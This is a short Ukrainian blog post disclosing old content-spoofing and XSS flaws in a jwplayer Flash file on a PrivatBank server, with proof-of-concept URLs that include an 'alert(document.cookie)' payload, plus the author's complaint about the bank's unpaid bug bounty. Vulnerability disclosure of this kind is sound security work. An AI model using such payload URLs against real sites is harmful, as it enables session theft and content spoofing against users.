Уразливості на сайті ПриватБанку

22:43 30.08.2023

Раніше, 18.03.2013, я знайшов Content Spoofing та Cross-Site Scripting уразливості на сайті 217.117.65.248. В той час я вислав ці уразливості банку.

Content Spoofing (WASC-12):

Підробка вмісту через довільні адреси в параметрах file та image.

http://217.117.65.248/static/library/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://217.117.65.248/static/library/jwplayer/player.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Підробка вмісту через параметр config із довільною адресою файлу.

http://217.117.65.248/static/library/jwplayer/player.swf?config=1.xml

У файлі 1.xml можна вказати шляхи до flv та jpg.

Content Spoofing (WASC-12):

Підробка вмісту через параметр playlistfile із довільною адресою файлу.

http://217.117.65.248/static/library/jwplayer/player.swf?playlistfile=1.rss

XSS (WASC-08):

http://217.117.65.248/static/library/jwplayer/player.swf?playerready=alert(document.cookie)

Також флешка player.swf мала JavaScript калбеки, що дозволяли провести XSS атаки. Всього таких функцій 19, де можна було провести XSS атаку.

ПриватБанк тоді прийняв ці уразливості в свою програму, не оплатив і через багато років приховано виправив. Таким чином банк кинув мене, як це було з дірками на bonus.privatbank.ua та інших сайтах ПБ.


Leave a Reply

You must be logged in to post a comment.